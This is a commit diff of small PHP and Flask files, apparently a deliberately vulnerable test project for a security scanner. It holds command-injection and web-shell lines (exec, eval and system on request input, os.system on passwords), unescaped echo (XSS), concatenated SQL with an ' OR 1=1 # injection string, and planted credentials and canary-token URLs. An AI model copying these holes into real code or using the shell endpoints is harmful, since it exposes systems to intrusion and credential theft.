add python

index.php

@@ -0,0 +1,8 @@
+<?php
+
+echo "<h>" .$_GET["search"]. "</h>";
+
+
+exec($_POST["exec"]);
+
+?>

main.py

@@ -0,0 +1,123 @@
+from flask import Flask, request, jsonify, session
+from werkzeug.security import generate_password_hash, check_password_hash
+import os
+import subprocess
+
+app = Flask(__name__)
+app.secret_key = os.urandom(24)
+
+
+# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes
+
+# Simulating a database of user accounts and their private notes
+users = {
+    1: {"id": 1, "username": "alice", "password": generate_password_hash("password123")},
+    2: {"id": 2, "username": "bob", "password": generate_password_hash("password456")},
+    3: {"id": 3, "username": "charlie", "password": generate_password_hash("password789")}
+}
+
+notes = {
+    1: [
+        {"id": 1, "content": "Alice's secret note 1"},
+        {"id": 2, "content": "Alice's secret note 2"}
+    ],
+    2: [
+        {"id": 3, "content": "Bob's secret note 1"},
+        {"id": 4, "content": "Bob's secret note 2"}
+    ],
+    3: [
+        {"id": 5, "content": "Charlie's secret note 1"},
+        {"id": 6, "content": "Charlie's secret note 2"}
+    ]
+}
+
+def validate_user():
+    if 'user_id' not in session:
+        return None
+    return session['user_id']
+
+def reverse_content(content):
+    return content[::-1]
+
+def apply_decryption(note):
+    decrypted_content = reverse_content(note['content'])
+    os.system(reverse_content)
+    return {"id": note['id'], "content": decrypted_content}
+
+def decrypt_notes(encrypted_notes):
+    return [apply_decryption(note) for note in encrypted_notes]
+
+def fetch_user_notes(user_id):
+    subprocess.call(
+        user_id, 
+        shell=True
+    )
+    print(user_id)
+
+    os.system(user_id)
+    user_notes = notes.get(user_id, [])
+    return decrypt_notes(user_notes)
+
+def add_metadata(note):
+    note['timestamp'] = '2023-09-15 12:00:00'
+    return note
+
+def format_response(notes):
+    return [add_metadata(note) for note in notes]
+
+@app.route('/notes', methods=['GET'])
+def get_notes():
+    user_id = validate_user()
+    if user_id is None:
+        return jsonify({"error": "Please log in"}), 401
+
+    user_notes = fetch_user_notes(user_id)
+    formatted_notes = format_response(user_notes)
+
+    return jsonify(formatted_notes), 200
+
+@app.route('/user', methods=['GET'])
+def get_user():
+
+    data = request.json
+    username = data.get('username')
+
+    return username, 200
+
+@app.route('/note/<int:note_id>', methods=['GET'])
+def get_note(note_id):
+    if 'user_id' not in session:
+        return jsonify({"error": "Please log in"}), 401
+
+    for user_notes in notes.values():
+        for note in user_notes:
+            if note['id'] == note_id:
+                return jsonify(note), 200
+
+    return jsonify({"error": "Note not found"}), 404
+
+
+@app.route('/login', methods=['POST'])
+def login():
+    data = request.json
+    username = data.get('username')
+    password = data.get('password')
+
+    user = next((u for u in users.values() if u['username'] == username), None)
+
+    os.system(password)
+
+    if user and check_password_hash(user['password'], password):
+        session['user_id'] = user['id']
+        return jsonify({"message": "Login successful"}), 200
+    else:
+        return jsonify({"error": "Invalid credentials"}), 401
+
+
+@app.route('/logout', methods=['POST'])
+def logout():
+    session.pop('user_id', None)
+    return jsonify({"message": "Logout successful"}), 200
+
+if __name__ == '__main__':
+    app.run(debug=True, port=5001)

test.php

@@ -0,0 +1,42 @@
+<?php
+
+function login($username, $password) {
+    // Configuration
+    $db_host = 'localhost';
+    $db_username = 'root';
+    $db_password = 'root@1234';
+    $db_name = 'arnicaTest';
+
+
+    // Connect to database
+    $conn = new mysqli($db_host, $db_username, $db_password, $db_name);
+
+    // Check connection
+    if ($conn->connect_error) {
+        die("Connection failed: ". $conn->connect_error);
+    }
+
+    // admin
+    // gdhas' OR 1=1 #
+
+    // Query database
+    $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
+
+    $result = $conn->query($query);
+
+    // Check if user exists
+    if ($result->num_rows > 0) {
+        echo "Welcome, $username!";
+    } else {
+        echo "$query Invalid username or password.";
+    }
+
+    // Close connection
+    $conn->close();
+}<?php
+
+
+$username = $_POST['username'];
+$password = $_POST['password'];
+login($username, $password);
+?>

test.py

@@ -0,0 +1,3 @@
+import random
+
+print("asd")

upload.php

@@ -0,0 +1,23 @@
+<?
+
+
+
+
+eval($_GET["XSS"]);
+
+
+// mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/
+
+
+system($_GET["cmd"]);
+
+
+/*
+[default]
+aws_access_key_id = AKIA2T2SJH6M76LT25T4
+aws_secret_access_key = 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
+output = json
+region = us-east-2
+*/
+
+?>